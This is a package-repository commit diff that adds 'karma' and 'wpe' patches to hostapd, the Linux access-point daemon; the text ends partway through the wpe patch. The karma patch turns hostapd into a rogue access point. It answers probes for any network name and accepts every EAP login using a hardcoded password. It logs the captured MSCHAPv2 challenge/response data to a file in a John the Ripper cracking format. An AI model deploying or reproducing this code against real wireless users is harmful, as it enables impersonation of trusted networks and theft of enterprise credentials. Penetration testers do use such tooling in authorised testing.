hostapd: wpe support added (EAP-FAST, PEAP MSCHAPv2). Karma patch updated

net-wireless/hostapd/Manifest

@@ -2,9 +2,12 @@ AUX cui-20120417.patch 13221 SHA256 b853484cd5d3e89e4eb96be3edf0bedef01922e74cd8
 AUX cui-20120717.patch 12726 SHA256 ce24f99b5d45b78af750339ac8c05595b0faed7cecd99fa8e8072e65386d8e05 SHA512 23315310f21d15863aa5f01c907d23662023853732e45ae59d454cceda9dc3ab866df45712d6538978e8cb0c053955345b0714bf998961840d87553df985311b WHIRLPOOL 158d41102872aecc2ccb0cde2826cb76041f36f360a2a0f38a78ea87f8a540c5f3b688724f86199649ae5fa32e97ff8d8a92be67398e19d51f9ba363b540f511
 AUX hostapd-0.7.3-karma.patch 17778 SHA256 28b8963c836e0208d8f621c6345e27d66ad2a8df33eec99d2505fc7980019ee8 SHA512 c4a1231ae6ed613d3218bfb30c6a95f5cbcfc67371996522131cb4effb29c6fadf3b324ef2a308dab2046fa234ad86e9b0048a2f356f2a2b6413f5d22248830f WHIRLPOOL 5272fc3e1f4d9513562604c2f324aebbc38d8ff83e4bcca5cc79ab27c35475f7ffeabe780fd7fc73cf163cbe9536e8ca44b3b3996080926dcc11a97072cd7061
 AUX hostapd-1.0-karma.patch 15724 SHA256 9f4d853c2974607aed7accb5785df224e3abdce4baf4dee787ca45421c85ec87 SHA512 694e8e03db5e3577359b0cc5c530ef528dd2bbeb64351060113fe67ee4446495999330edc5f38c3206c8525c5f401e35ca8a3c0f372f5c8e3205172680cf7fd9 WHIRLPOOL 36f6a45310a642fb2b1c2225d560ac85b1c08074c08108682fbb638ad27f8d01858ba48a2b64ffaa01832a52185afe5c39b521635b8767abdfaefb6c84a0a903
+AUX hostapd-1.0-karma2.patch 16477 SHA256 8901de7d3adae4ef74ad779186019f305533695288c106619ed97c330037f2ce SHA512 58e315ae6068e3dd2107f2036ac69deb1ad05c5c5df28ddd19e4faa0dcf1eb1756c72c4f3307d03fe2a51c9c9622de201701686e473a39279ccc80cd42a8ec46 WHIRLPOOL 2c77c208ff4a86bbe324f4a284339c1f0ccb7b79b080a61d98c2391f0b90f7527ab4338e85bec4d192bcc65adcc6f1a6c123329c7a8ef8f294afce2ddeb5f066
 AUX hostapd-1.0-karma_cli.patch 39202 SHA256 ce40eb1f2a205ef9ec5d0ff87c9df85a86cb21cbe016a324a9bfddb728b57685 SHA512 94e8ea5a57859063c0b8c33709dcef72392c6b8e27c5003ed9217e9756ae39936348daf480fcf829f32ce56783fb817772425ba832f6adab7561a949ea3f6421 WHIRLPOOL c1827bc5ab346ff5249d2751090b953767a6e8696b60c03aefe578c4d5bf9e990426acecbca2f7d67d1e151262ce3ea994704789b7522e365b3a1678dbb41c79
 AUX hostapd-1.0-libnl_path_fix.patch 892 SHA256 7ec9489fed14b7f3916d0aab63e34886bcf39d07c257101df53e16ef4db2b95d SHA512 10b1db56ec2bb8a2ab04dcd50b5a0442efdd4814ef6a4effc50d0157d61fc993ebb6f2f6775566fc0341668ad314dd2d4ec4e91177d59d76c59b8ceb2bf4c2f4 WHIRLPOOL ae16d72eb649d7267191a2542c204da92493279f3d09dc9de4349ca4a8db9d7e5f46d3d824e4b22900ad257e1bdcf86b26fb46eee63cbb8af48bd739b0d27ea0
 AUX hostapd-1.0-tls_length_fix.patch 1859 SHA256 bbca0422a0babbf9d7fad2b758ecddaae45624db1b2db6d7663292548e25906a SHA512 e354e9352605003101cba296735232d11ac685f1db8718e5d59b55de1b86b55144e4871afe85cae4374f52af1b42df3ebd4747e109c86e0750ef9eb5345453d7 WHIRLPOOL 6a9379b09ffb73d13ea813952e2b39b5ab90ec98a27ed211ff2904d52e346c9e6273fe99e8ae6509773597afa352d9e77f3081103c5e5c55c86e12f8176a5419
+AUX hostapd-1.0-wpe.patch 6196 SHA256 421ca210e1e071153e22dd83162cfa05dfbece47d2b4479eadbb3821098d7dd4 SHA512 16d24477883ccefec82d68e4ade58761ad1eaf7731958df839e6de454f65c20b5e41bc5748a0b415fceda8db24fa4533e508e9ed8e912dd3542d774d72382b1b WHIRLPOOL 3d135d0659e9e435d9699f3d76da35d0238a1f29a6f8b3298966a7a60646d1272b85e1b79882eae842e27f55cfb50a63fad2cc8909036a6f32d571fd233d761e
+AUX hostapd-1.0-wpe_karma.patch 6293 SHA256 44075cb7cfff24c4f7a13f2c7aaef5b32db9da2ec3b1e3ffd5f6c5ab9f062066 SHA512 d89baa9aafc20db0840007f1e88823b7e19f5f9869abd60a452d0c6f8a560e41fb2d74b044d1acbf592379b903b9d174dbe4abc358114d741f805279ea3906d7 WHIRLPOOL f51daea3dbaa3e4e7d2549576130ef1704ddac775cffe3e8715f84bbeae8568cdfadb90f85188943bf3d9cef0c29ecc111041cf0eb5ccc7485c7083afc0c5bac
 AUX hostapd-2.0-cui.patch 12848 SHA256 86f3eeab008901c3f7f59d7a6a27f94292b9fdd58b41ef84170ba40b5fa83397 SHA512 20b1f89773e3bb1630c554f28803f0b5b6adfbbb969428a88ed6d1cba4ba21c36946048ac16672a2378d2ae85ca7ccb0a77b0df7d56a99c013054421cdae7fa3 WHIRLPOOL 77ee4d3c386fb4da275da05d5acad30bc98a3212301da68df7af6261d23ca7e5c3f85ee805ab70c68cc833e92afd290f845c0320d7af90ff0feb7579cf14342e
 AUX hostapd-2.0-karma.patch 38791 SHA256 bfaca51b2b03e11277debb452b0a52b5078115ed8967ddfbd7874a4e3ad26afc SHA512 269fbe1b420177b63c5c24321f2a435ef3338db36ee534c3e205f5c6f1e85df1b89ce6fb5de1ae363c5ff8965ec719fa2e0b80f0a2be3d1cc9ed84eecca8cce6 WHIRLPOOL cf69a9ea51bc94095fe89bb379436c305972a6675439683ff457a1c6853eebf7e77bf580f2624494cd48f39c45b82d1f7ff937728cd2527e4a307cbbfa14a2a1
 AUX hostapd-2.0-tls_length_fix.patch 1859 SHA256 bbca0422a0babbf9d7fad2b758ecddaae45624db1b2db6d7663292548e25906a SHA512 e354e9352605003101cba296735232d11ac685f1db8718e5d59b55de1b86b55144e4871afe85cae4374f52af1b42df3ebd4747e109c86e0750ef9eb5345453d7 WHIRLPOOL 6a9379b09ffb73d13ea813952e2b39b5ab90ec98a27ed211ff2904d52e346c9e6273fe99e8ae6509773597afa352d9e77f3081103c5e5c55c86e12f8176a5419
@@ -14,6 +17,7 @@ DIST hostapd-1.0.tar.gz 1327943 SHA256 002e9dcb7e46cf82b5900a2fcf92b30fc8cdfd32a
 DIST hostapd-2.0.tar.gz 1376203 SHA256 262ce394b930bccc3d65fb99ee380f28d36444978f524c845a98e8e29f4e9d35 SHA512 25fddaaddb22903078cfaae29a1e955b60955f9f5542b52962a6a8d4c65146ca102e9ac085118ce422843c55349a74a019220dfd4926895e301d506dbc97b967 WHIRLPOOL e5ae2e760770d2f307b1c4235c9b0c9d25e1719a1d174efa30ce6bbbc07b5c46d5f7babc087b8f450f3b485fb640728ddd23761fb292bcd535ef38dc10ac1d45
 EBUILD hostapd-1.0-r4.ebuild 5519 SHA256 c911846537d95e6ce101988af1157ec772d03ce34da0ec6aa657580e4b497852 SHA512 7e01750d68513e33c0ee8848dd6ee851a32cfb500aa0cfae802b7aabaf86b32c2992b229f1f94f345ecc8dc0b4f220483f4b05f9f87b89b6fca8d37b6af0543b WHIRLPOOL 5dffe8e9070db5c2d71b4df1cedf52a7bf3f57308f76b4a13d2c11f6083c0e611c42c389ba9a75e4d15dba93534d18054a4b662b7223cf278de45e3362ca00cd
 EBUILD hostapd-1.0-r6.ebuild 5667 SHA256 2498a2a7dca7a45c8c098d97fbc2f6debd6d4ae2df992f47fa3cd47a437ed09c SHA512 f5a4627b4127eec130d88cfcadde6b168483b17376dd84ba119cb7304b0e5aa5a772768d30a112717af2ef0594f5007de218821c6012dbcba32c4551e69b291f WHIRLPOOL 5ea5f3a21e37400b417f3ff61506188233275e03180757128835213da9e935b7aeef53f65794edff1a16a86bd471aa7c75711cc730fd2c306b9144ece4b3e8f5
+EBUILD hostapd-1.0-r7.ebuild 5916 SHA256 9ede6d25a38b51aaf6ea8fa3a2f648dcfdcea48e4b177b3778be24d1d3993be4 SHA512 039fc4bb08574d3f08d63c5951441e772063ebeeaa2f6e319b68f454e7773f12f544ec70b55983bbc7ff1d8d0abc91c4dff9d828f0b61f709f268a55e8332ff5 WHIRLPOOL b9448c754fdd27088cb3069c746d6836f076363d30885416b141a03df36bf5a261eae5832159a4787934f4c5bec8bd9408e82d33fe9908aa6b0038fdb0418931
 EBUILD hostapd-2.0.ebuild 5695 SHA256 9f1387a7211e129e70dd71b6df7b503a868e9cf0f9c7d69106863250ca3de28b SHA512 7faf8f435e1b1e6c8a4d1b0af01de2efeefd047034daa968302db6520316d7584bf12ca693f02078918228e0785ef6deb9ef55ebb23bf763bcc8f8f852b25fa5 WHIRLPOOL ecea5b9c63af0dc5ef6bfc3bc4da9702930704311968e4b42ec30495f1e6ace88e8d2f87a97a863b6de0f2e4f6b60b66f44f8037fc3697c6486b95e4947f2211
 MISC ChangeLog 20312 SHA256 4a1673cde56f1b7ea1dfd20f0ac702ad3e7e916b84cfdf4f5aa0448d01b13659 SHA512 1c03ba7921beb21500e160aa5abfb867967777f0c4a36e220524bde419a30663a03d38b757c97405a88e1a5a2baf91e27b8022514ae99bdd1b4768ad520ec15e WHIRLPOOL 3c0df927502c29770fcac11fad0a5c655ff05674fc7444fef1e4a68cdbb55b1690efd3b89d3240a978f045d33029be036961a44095173660cfe4d20c3a05918b
 MISC metadata.xml 752 SHA256 78c8bab11c00f4988d677b1f4bf5a66c3221c0f9a3c46cfaf333a8857f250662 SHA512 c9e8749a721896e4b91ee76b9008e8a3e0d58496d804a6ce103fa501ccd0322b18b28f69432babc506a4c97a22c993da11c34946d6b44517b3cbb45f80bf6bde WHIRLPOOL c8cc369fa5d5725617c4143053bef31f34fdc40b9a7c36a082765d5e9afcd12f5b45d567e7ea3e2431dfbbf3378daf05b73aead94978e650e012652e1928d7aa

net-wireless/hostapd/files/hostapd-1.0-karma2.patch

@@ -0,0 +1,449 @@
+diff -rubN hostapd-1.0/hostapd/hostapd.conf hostapd-1.0-jmk/hostapd/hostapd.conf
+--- hostapd-1.0/hostapd/hostapd.conf	2012-05-09 16:56:09.000000000 -0500
++++ hostapd-1.0-jmk/hostapd/hostapd.conf	2012-08-09 16:22:15.896176672 -0500
+@@ -3,7 +3,7 @@
+ 
+ # AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
+ # management frames); ath0 for madwifi
+-interface=wlan0
++interface=wlan1
+ 
+ # In case of madwifi, atheros, and nl80211 driver interfaces, an additional
+ # configuration parameter, bridge, may be used to notify hostapd if the
+@@ -23,6 +23,7 @@
+ # Use driver=none if building hostapd as a standalone RADIUS server that does
+ # not control any wireless/wired driver.
+ # driver=hostap
++driver=nl80211
+ 
+ # hostapd event logger configuration
+ #
+@@ -83,12 +84,12 @@
+ ##### IEEE 802.11 related configuration #######################################
+ 
+ # SSID to be used in IEEE 802.11 management frames
+-ssid=test
++ssid=YouReallyWantToConnect
+ 
+ # Country code (ISO/IEC 3166-1). Used to set regulatory domain.
+ # Set as needed to indicate country in which device is operating.
+ # This can limit available channels and transmit power.
+-#country_code=US
++country_code=US
+ 
+ # Enable IEEE 802.11d. This advertises the country_code and the set of allowed
+ # channels and transmit power levels based on the regulatory limits. The
+@@ -99,13 +100,13 @@
+ 
+ # Operation mode (a = IEEE 802.11a, b = IEEE 802.11b, g = IEEE 802.11g,
+ # Default: IEEE 802.11b
+-hw_mode=g
++hw_mode=b
+ 
+ # Channel number (IEEE 802.11)
+ # (default: 0, i.e., not set)
+ # Please note that some drivers do not use this value from hostapd and the
+ # channel will need to be configured separately with iwconfig.
+-channel=1
++channel=6
+ 
+ # Beacon interval in kus (1.024 ms) (default: 100; range 15..65535)
+ beacon_int=100
+@@ -413,7 +414,7 @@
+ ##### IEEE 802.1X-2004 related configuration ##################################
+ 
+ # Require IEEE 802.1X authorization
+-#ieee8021x=1
++ieee8021x=1
+ 
+ # IEEE 802.1X/EAPOL version
+ # hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
+@@ -421,7 +422,7 @@
+ # the new version number correctly (they seem to drop the frames completely).
+ # In order to make hostapd interoperate with these clients, the version number
+ # can be set to the older version (1) with this configuration value.
+-#eapol_version=2
++eapol_version=1
+ 
+ # Optional displayable message sent with EAP Request-Identity. The first \0
+ # in this string will be converted to ASCII-0 (nul). This can be used to
+@@ -463,26 +464,26 @@
+ # Use integrated EAP server instead of external RADIUS authentication
+ # server. This is also needed if hostapd is configured to act as a RADIUS
+ # authentication server.
+-eap_server=0
++eap_server=1
+ 
+ # Path for EAP server user database
+ #eap_user_file=/etc/hostapd.eap_user
+ 
+ # CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
+-#ca_cert=/etc/hostapd.ca.pem
++ca_cert=/etc/hostapd/gd-bundle.pem
+ 
+ # Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
+-#server_cert=/etc/hostapd.server.pem
++server_cert=/etc/hostapd/INTRANET.pem
+ 
+ # Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
+ # This may point to the same file as server_cert if both certificate and key
+ # are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be
+ # used by commenting out server_cert and specifying the PFX file as the
+ # private_key.
+-#private_key=/etc/hostapd.server.prv
++private_key=/etc/hostapd/INTRANET.pem
+ 
+ # Passphrase for private key
+-#private_key_passwd=secret passphrase
++private_key_passwd=TopSecretFoofusPassword
+ 
+ # Enable CRL verification.
+ # Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
+@@ -679,7 +680,7 @@
+ # and/or WPA2 (full IEEE 802.11i/RSN):
+ # bit0 = WPA
+ # bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
+-#wpa=1
++wpa=3
+ 
+ # WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
+ # secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
+@@ -700,7 +701,7 @@
+ # entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be
+ # added to enable SHA256-based stronger algorithms.
+ # (dot11RSNAConfigAuthenticationSuitesTable)
+-#wpa_key_mgmt=WPA-PSK WPA-EAP
++wpa_key_mgmt=WPA-EAP
+ 
+ # Set of accepted cipher suites (encryption algorithms) for pairwise keys
+ # (unicast packets). This is a space separated list of algorithms:
+diff -rubN hostapd-1.0/hostapd/main.c hostapd-1.0-jmk/hostapd/main.c
+--- hostapd-1.0/hostapd/main.c	2012-05-09 16:56:09.000000000 -0500
++++ hostapd-1.0-jmk/hostapd/main.c	2012-08-09 16:12:23.722163161 -0500
+@@ -39,6 +39,10 @@
+ 
+ extern struct wpa_driver_ops *wpa_drivers[];
+ 
++/* Karma Mode */
++#include "karma/karma.h"
++int karma_beacon_respond = 0;
++int karma_eap_auth = 0;
+ 
+ struct hapd_global {
+ 	void **drv_priv;
+@@ -521,7 +525,7 @@
+ 	show_version();
+ 	fprintf(stderr,
+ 		"\n"
+-		"usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
++		"usage: hostapd [-hdBKtvRA] [-P <PID file>] [-e <entropy file>] "
+ 		"<configuration file(s)>\n"
+ 		"\n"
+ 		"options:\n"
+@@ -535,7 +539,9 @@
+ 		"   -f   log output to debug file instead of stdout\n"
+ #endif /* CONFIG_DEBUG_FILE */
+ 		"   -t   include timestamps in some debug messages\n"
+-		"   -v   show hostapd version\n");
++		"   -v   show hostapd version\n"
++		"   -R   [karma] respond to all probes\n"
++		"   -A   [karma] log all authentication attempts\n");
+ 
+ 	exit(1);
+ }
+@@ -564,7 +570,7 @@
+ 		return -1;
+ 
+ 	for (;;) {
+-		c = getopt(argc, argv, "Bde:f:hKP:tv");
++		c = getopt(argc, argv, "Bde:f:hKP:tvRA");
+ 		if (c < 0)
+ 			break;
+ 		switch (c) {
+@@ -599,7 +605,12 @@
+ 			show_version();
+ 			exit(1);
+ 			break;
+-
++		case 'R':
++			karma_beacon_respond++;
++			break;
++		case 'A':
++			karma_eap_auth++;
++			break;
+ 		default:
+ 			usage();
+ 			break;
+diff -rubN hostapd-1.0/hostapd/Makefile hostapd-1.0-jmk/hostapd/Makefile
+--- hostapd-1.0/hostapd/Makefile	2012-05-09 16:56:09.000000000 -0500
++++ hostapd-1.0-jmk/hostapd/Makefile	2012-08-09 16:12:23.722163161 -0500
+@@ -95,6 +95,7 @@
+ 
+ OBJS += ../src/eapol_auth/eapol_auth_sm.o
+ 
++OBJS += ../src/karma/karma.o 
+ 
+ ifndef CONFIG_NO_DUMP_STATE
+ # define HOSTAPD_DUMP_STATE to include SIGUSR1 handler for dumping state to
+diff -rubN hostapd-1.0/src/ap/beacon.c hostapd-1.0-jmk/src/ap/beacon.c
+--- hostapd-1.0/src/ap/beacon.c	2012-05-09 16:56:09.000000000 -0500
++++ hostapd-1.0-jmk/src/ap/beacon.c	2012-08-09 16:12:23.724163161 -0500
+@@ -34,6 +34,7 @@
+ #include "ap_drv_ops.h"
+ #include "beacon.h"
+ 
++#include "karma/karma.h"
+ 
+ #ifdef NEED_AP_MLME
+ 
+@@ -283,6 +284,22 @@
+ 		if (sta)
+ 			sta->ssid_probe = &hapd->conf->ssid;
+ 	}
++	/* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
++	else if (karma_beacon_respond) {
++		char ssid_txt[33];
++		char *message = NULL;
++		
++		ieee802_11_print_ssid(ssid_txt, elems.ssid, elems.ssid_len);
++		
++		if (asprintf(&message, "Probe request from " MACSTR " for SSID '%s'", MAC2STR(mgmt->sa), ssid_txt) < 0)
++			wpa_printf(MSG_ERROR, "Error allocating memory for Karma message\n");
++		
++		karma_logger(0, message);
++		free(message);
++		
++		ssid = (char *)elems.ssid;
++		ssid_len = elems.ssid_len;
++	}
+ 
+ 	if (!ssid) {
+ 		if (!(mgmt->da[0] & 0x01)) {
+diff -rubN hostapd-1.0/src/ap/hostapd.c hostapd-1.0-jmk/src/ap/hostapd.c
+--- hostapd-1.0/src/ap/hostapd.c	2012-05-09 16:56:09.000000000 -0500
++++ hostapd-1.0-jmk/src/ap/hostapd.c	2012-08-09 16:12:23.725163160 -0500
+@@ -37,6 +37,7 @@
+ #include "ap_config.h"
+ #include "p2p_hostapd.h"
+ 
++#include "karma/karma.h"
+ 
+ static int hostapd_flush_old_stations(struct hostapd_data *hapd, u16 reason);
+ static int hostapd_setup_encryption(char *iface, struct hostapd_data *hapd);
+diff -rubN hostapd-1.0/src/ap/ieee802_11.c hostapd-1.0-jmk/src/ap/ieee802_11.c
+--- hostapd-1.0/src/ap/ieee802_11.c	2012-05-09 16:56:09.000000000 -0500
++++ hostapd-1.0-jmk/src/ap/ieee802_11.c	2012-08-09 16:12:23.727163160 -0500
+@@ -42,6 +42,7 @@
+ #include "ap_drv_ops.h"
+ #include "ieee802_11.h"
+ 
++#include "karma/karma.h"
+ 
+ u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
+ {
+@@ -520,8 +521,9 @@
+ 	if (ssid_ie == NULL)
+ 		return WLAN_STATUS_UNSPECIFIED_FAILURE;
+ 
+-	if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+-	    os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
++	/* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */ 
++	if ((!karma_beacon_respond) && (ssid_ie_len != hapd->conf->ssid.ssid_len || 
++		os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) { 
+ 		char ssid_txt[33];
+ 		ieee802_11_print_ssid(ssid_txt, ssid_ie, ssid_ie_len);
+ 		hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
+diff -rubN hostapd-1.0/src/eap_server/eap_server.c hostapd-1.0-jmk/src/eap_server/eap_server.c
+--- hostapd-1.0/src/eap_server/eap_server.c	2012-05-09 16:56:09.000000000 -0500
++++ hostapd-1.0-jmk/src/eap_server/eap_server.c	2012-08-09 16:17:04.200169582 -0500
+@@ -25,6 +25,8 @@
+ #include "state_machine.h"
+ #include "common/wpa_ctrl.h"
+ 
++#include "karma/karma.h"
++
+ #define STATE_MACHINE_DATA struct eap_sm
+ #define STATE_MACHINE_DEBUG_PREFIX "EAP"
+ 
+@@ -100,10 +102,8 @@
+ 		 int phase2)
+ {
+ 	struct eap_user *user;
+-
+-	if (sm == NULL || sm->eapol_cb == NULL ||
+-	    sm->eapol_cb->get_eap_user == NULL)
+-		return -1;
++    char *username = NULL;
++    char *message = NULL;
+ 
+ 	eap_user_free(sm->user);
+ 	sm->user = NULL;
+@@ -112,11 +112,39 @@
+ 	if (user == NULL)
+ 	    return -1;
+ 
++    /* Karma EAP Modifications */
++    if (karma_eap_auth) {
++        /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */ 
++        user->methods[0].vendor = sm->respVendor; 
++        user->password = os_zalloc(9); 
++        strncpy((char *)user->password, "Cricket8", 8); /* Magic password allows successful authentication */
++        user->password_len = 8;
++        
++        if (phase2)
++            user->methods[0].method = EAP_TYPE_MSCHAPV2; 
++        else // TODO: what happens if we propose LEAP?
++            user->methods[0].method = EAP_TYPE_PEAP; 
++                                                                                                                                      
++        username = os_zalloc(sm->identity_len + 1);
++        strncpy(username, (char *)sm->identity, (size_t)sm->identity_len);
++        if (asprintf(&message, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod) < 0)
++            printf("Error allocating memory for request message.\n"); 
++        //wpa_printf(MSG_ERROR, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod);
++
++        karma_logger(0, message); 
++        free(message);
++    }
++    else {
++        if (sm == NULL || sm->eapol_cb == NULL ||
++            sm->eapol_cb->get_eap_user == NULL)
++        return -1;
++
+ 	if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
+ 				       identity_len, phase2, user) != 0) {
+ 		eap_user_free(user);
+ 		return -1;
+ 	}
++    }
+ 
+ 	sm->user = user;
+ 	sm->user_eap_method_index = 0;
+diff -rubN hostapd-1.0/src/eap_server/eap_server_mschapv2.c hostapd-1.0-jmk/src/eap_server/eap_server_mschapv2.c
+--- hostapd-1.0/src/eap_server/eap_server_mschapv2.c	2012-05-09 16:56:09.000000000 -0500
++++ hostapd-1.0-jmk/src/eap_server/eap_server_mschapv2.c	2012-08-09 16:12:23.732163160 -0500
+@@ -19,6 +19,7 @@
+ #include "crypto/random.h"
+ #include "eap_i.h"
+ 
++#include "karma/karma.h"
+ 
+ struct eap_mschapv2_hdr {
+ 	u8 op_code; /* MSCHAPV2_OP_* */
+@@ -290,13 +291,15 @@
+ 					  struct wpabuf *respData)
+ {
+ 	struct eap_mschapv2_hdr *resp;
+-	const u8 *pos, *end, *peer_challenge, *nt_response, *name;
++	const u8 *pos, *end, *auth_challenge, *peer_challenge, *nt_response, *name;
+ 	u8 flags;
+ 	size_t len, name_len, i;
+ 	u8 expected[24];
+ 	const u8 *username, *user;
+ 	size_t username_len, user_len;
+ 	int res;
++	char *auth_creds = NULL;
++	int auth_creds_len = 0;
+ 
+ 	pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
+ 			       &len);
+@@ -336,6 +339,37 @@
+ 	wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
+ 	wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ 
++	/* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */  
++	/* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */ 
++    if (karma_eap_auth) { 
++        auth_creds_len = sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 16*2; 
++        auth_creds = os_malloc(auth_creds_len + 1); 
++        memset(auth_creds, 0, auth_creds_len + 1); 
++ 
++        strncpy(auth_creds, (char *)sm->identity, sm->identity_len); 
++        sprintf(auth_creds + sm->identity_len, ":::"); 
++ 
++        /* Authenticator Challenge */ 
++        auth_challenge = data->auth_challenge; 
++        for (i=0; i<16; i++) 
++            sprintf(auth_creds + sm->identity_len + 3 + 2*i, "%2.2X", 0xFF & (int)auth_challenge[i]); 
++ 
++        sprintf(auth_creds + sm->identity_len + 3 + 16*2, ":"); 
++ 
++        /* MSCHAPv2 Response */ 
++        for (i=0; i<24; i++) 
++            sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 2*i, "%2.2X", 0xFF & (int)nt_response[i]); 
++ 
++        sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2, ":"); 
++ 
++        /* Peer Challenge */ 
++        for (i=0; i<16; i++) 
++            sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 2*i, "%2.2X", 0xFF & (int)peer_challenge[i]); 
++ 
++        karma_logger(1, auth_creds); 
++        free(auth_creds); 
++    }
++
+ 	/* MSCHAPv2 does not include optional domain name in the
+ 	 * challenge-response calculation, so remove domain prefix
+ 	 * (if present). */
+diff -rubN hostapd-1.0/src/karma/karma.c hostapd-1.0-jmk/src/karma/karma.c
+--- hostapd-1.0/src/karma/karma.c	1969-12-31 18:00:00.000000000 -0600
++++ hostapd-1.0-jmk/src/karma/karma.c	2012-08-09 16:12:23.732163160 -0500
+@@ -0,0 +1,44 @@
++#define _GNU_SOURCE
++#include <stdio.h>
++#include <time.h>
++
++#include "common.h"
++#include "includes.h"
++#include "trace.h"                                                                                                                                                       
++
++#include "karma/karma.h"
++
++/* Karma Mode: Log data related to MSCHAPv2 challenge/response authentication attempts */
++extern void karma_logger(int type, char *message)
++{
++    FILE *logfd;
++    time_t cur_time;
++    struct tm *tm_ptr;
++    char time_buf[256];                                                                                                                                                     
++    /* General: probe requests, username requests */
++    logfd = fopen("./hostapd-karma.txt", "a");
++    if (logfd == NULL) {
++        fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.txt\n");
++        logfd = stderr;
++    }
++
++    cur_time = time(NULL);
++    (void) time(&cur_time);
++    tm_ptr = localtime(&cur_time);
++    strftime(time_buf, 256, "%Y-%m-%d %H:%M:%S", tm_ptr);
++    fprintf(logfd, "%s:%s\n", time_buf, message);
++    fprintf(stderr, "[karma] %s:%s\n", time_buf, message);
++    fclose(logfd);
++    
++    /* MSCHAPv2 Challenge/Response */
++    if (type == 1)
++    {
++        logfd = fopen("./hostapd-karma.lc", "a");
++        if (logfd == NULL) {
++            fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.lc\n");
++            logfd = stderr;
++        }
++        fprintf(logfd, "%s\n", message);
++        fclose(logfd);
++    }
++}
+diff -rubN hostapd-1.0/src/karma/karma.d hostapd-1.0-jmk/src/karma/karma.d
+--- hostapd-1.0/src/karma/karma.d	1969-12-31 18:00:00.000000000 -0600
++++ hostapd-1.0-jmk/src/karma/karma.d	2012-08-09 16:24:57.196180351 -0500
+@@ -0,0 +1,4 @@
++../src/karma/karma.o: ../src/karma/karma.c ../src/utils/common.h \
++ ../src/utils/os.h ../src/utils/wpa_debug.h ../src/utils/wpabuf.h \
++ ../src/utils/includes.h ../src/utils/build_config.h ../src/utils/trace.h \
++ ../src/karma/karma.h
+diff -rubN hostapd-1.0/src/karma/karma.h hostapd-1.0-jmk/src/karma/karma.h
+--- hostapd-1.0/src/karma/karma.h	1969-12-31 18:00:00.000000000 -0600
++++ hostapd-1.0-jmk/src/karma/karma.h	2012-08-09 16:12:23.733163160 -0500
+@@ -0,0 +1,3 @@
++extern int karma_beacon_respond;
++extern int karma_eap_auth;                                                                                                                                                                                                       
++extern void karma_logger(int, char*);

net-wireless/hostapd/files/hostapd-1.0-wpe.patch

@@ -0,0 +1,153 @@
+diff -uNr hostapd-1.0/hostapd/main.c hostapd-1.0-wpe/hostapd/main.c
+--- hostapd-1.0/hostapd/main.c	2012-05-09 17:56:09.000000000 -0400
++++ hostapd-1.0-wpe/hostapd/main.c	2012-08-20 22:56:17.420486344 -0400
+@@ -508,7 +508,7 @@
+ static void show_version(void)
+ {
+ 	fprintf(stderr,
+-		"hostapd v" VERSION_STR "\n"
++		"hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
+ 		"User space daemon for IEEE 802.11 AP management,\n"
+ 		"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
+ 		"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
+diff -uNr hostapd-1.0/src/crypto/ms_funcs.c hostapd-1.0-wpe/src/crypto/ms_funcs.c
+--- hostapd-1.0/src/crypto/ms_funcs.c	2012-05-09 17:56:09.000000000 -0400
++++ hostapd-1.0-wpe/src/crypto/ms_funcs.c	2012-08-20 22:27:09.583819291 -0400
+@@ -83,7 +83,7 @@
+  * @challenge: 8-octet Challenge (OUT)
+  * Returns: 0 on success, -1 on failure
+  */
+-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
++int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ 			  const u8 *username, size_t username_len,
+ 			  u8 *challenge)
+ {
+diff -uNr hostapd-1.0/src/crypto/ms_funcs.h hostapd-1.0-wpe/src/crypto/ms_funcs.h
+--- hostapd-1.0/src/crypto/ms_funcs.h	2012-05-09 17:56:09.000000000 -0400
++++ hostapd-1.0-wpe/src/crypto/ms_funcs.h	2012-08-20 22:27:09.583819291 -0400
+@@ -37,6 +37,10 @@
+ int nt_challenge_response(const u8 *challenge, const u8 *password,
+ 			  size_t password_len, u8 *response);
+ 
